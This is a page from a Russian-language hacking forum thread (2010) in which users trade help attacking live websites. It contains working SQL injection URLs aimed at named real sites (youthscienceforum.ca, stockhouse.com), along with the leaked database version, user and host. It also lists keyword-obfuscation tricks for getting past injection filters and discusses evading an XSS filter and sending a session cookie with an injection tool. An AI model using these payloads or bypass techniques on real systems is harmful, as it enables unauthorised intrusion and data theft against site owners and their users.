HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 1303 из 2422 « Первая < 303803120312531293 1299 1300 1301 1302 1303 1304 1305 1306 1307 13131353140318032303 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 21.05.2010, 11:34
WebeX
Новичок
Регистрация: 31.03.2007
Сообщений: 22
Провел на форуме:
85992

Репутация: -1
По умолчанию
Привет всем, давненько у Вас не появлялся, вот вновь пришел!
Ребята есть вопрос, сегодня на одном из сайтов искал XSS при вводе <script>alert()</script> фильтр полностью обрезает что находится внутри <script></script>
Пробовал по другому <script 1></script 1> толку ноль!
BB кодами тож пробовал, разрешен код [IM*G][/IM*G] - (* нарочно поставил, что бы форум не реагировал!) если ставишь картинку то показывает ее нормально, если после картинки пробел то показывает только ссылку и тишина.
Подскажите что сделать можно!
 
Ответить с цитированием

  #2  
Старый 21.05.2010, 13:04
gromoza
Новичок
Регистрация: 21.12.2008
Сообщений: 24
Провел на форуме:
485675

Репутация: 10
По умолчанию
WebeX
http://ha.ckers.org/xss.html
 
Ответить с цитированием

  #3  
Старый 21.05.2010, 18:06
nedon
Новичок
Регистрация: 14.05.2010
Сообщений: 2
Провел на форуме:
13050

Репутация: 6
По умолчанию
я в slq новичек так что не пинайте сильно
Цитата:
Сообщение от xxx  
http://youthscienceforum.ca/view.php?id=17+and+1=2+union+select+1,2,3,aes_decr ypt(aes_encrypt(concat_ws(0x3a,version(),d atabase(),user()),0x71),0x71),5,6--


Version : 5.0.19-standard
Database : youthscienceforum
User : youthscience@205.207.185.71
OS : apple-darwin8.2.1

для раскрутки скуля достаточно узнать версию. Ну а для чего ещё пишут имя Database , User и OS(как узнать os).
Последний раз редактировалось nedon; 21.05.2010 в 18:09..
 
Ответить с цитированием

  #4  
Старый 21.05.2010, 18:17
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию
Цитата:
Сообщение от nedon  
я в slq новичек так что не пинайте сильно

для раскрутки скуля достаточно узнать версию. Ну а для чего ещё пишут имя Database , User и OS(как узнать os).
за красоту
 
Ответить с цитированием

  #5  
Старый 21.05.2010, 18:47
[Feldmarschall]
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
Провел на форуме:
568388

Репутация: 87
По умолчанию
Цитата:
Сообщение от nedon  
я в slq новичек так что не пинайте сильно

для раскрутки скуля достаточно узнать версию. Ну а для чего ещё пишут имя Database , User и OS(как узнать os).
Database.. бывают сразу много баз, и есле выводиш таблицы то пишешь с какой базы, так и в других целях бывает нужда... про user много тебе описывать не буду но посоветую почитать в мануале mysql и т.д...
 
Ответить с цитированием

  #6  
Старый 21.05.2010, 22:41
pinch
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
Провел на форуме:
540530

Репутация: 54
По умолчанию
попробуй вместо SELECT

1) %53%45%4C%45%43%54
2) SELeCt
3) SEL/*blabla*/ECt
4) 'SEL'+'ECT
5) /*!SELECT*/
 
Ответить с цитированием

  #7  
Старый 21.05.2010, 23:17
YuNi|[c
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
Провел на форуме:
556476

Репутация: 66
По умолчанию
Цитата:
Сообщение от pinch  
попробуй вместо SELECT

1) %53%45%4C%45%43%54
2) SELeCt
3) SEL/*blabla*/ECt
4) 'SEL'+'ECT
5) /*!SELECT*/
пробовал 1+or+1=(/*!SELECT*/+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES)--

PHP код:
Microsoft OLE DB Provider for SQL Server error '80040e14'     
Incorrect syntax near the keyword 'TOP'.    
/adredirect.aspline 23 
 
Ответить с цитированием

  #8  
Старый 21.05.2010, 23:19
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию
YuNi|[c


а без top ?
 
Ответить с цитированием

  #9  
Старый 21.05.2010, 23:24
YuNi|[c
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
Провел на форуме:
556476

Репутация: 66
По умолчанию
Цитата:
Сообщение от Konqi  
YuNi|[c


а без top ?
собсно вот сам ресурс:

PHP код:
http://www.stockhouse.com/adredirect.asp?sid=7385+or+1=(SELselectECT+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES)-- 
на без топ ругается на table_name
 
Ответить с цитированием

  #10  
Старый 22.05.2010, 01:08
RazyKK
Познающий
Регистрация: 09.02.2009
Сообщений: 70
Провел на форуме:
393885

Репутация: 34
По умолчанию
Как в sipt Cookies добавить?добовляю в additional headers
Cookie : PHPSESSID=3d896ce0ca05137e1ffa4f58893706e8
и вроде не работает так
 
Ответить с цитированием
Ответ
Страница 1303 из 2422 « Первая < 303803120312531293 1299 1300 1301 1302 1303 1304 1305 1306 1307 13131353140318032303 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ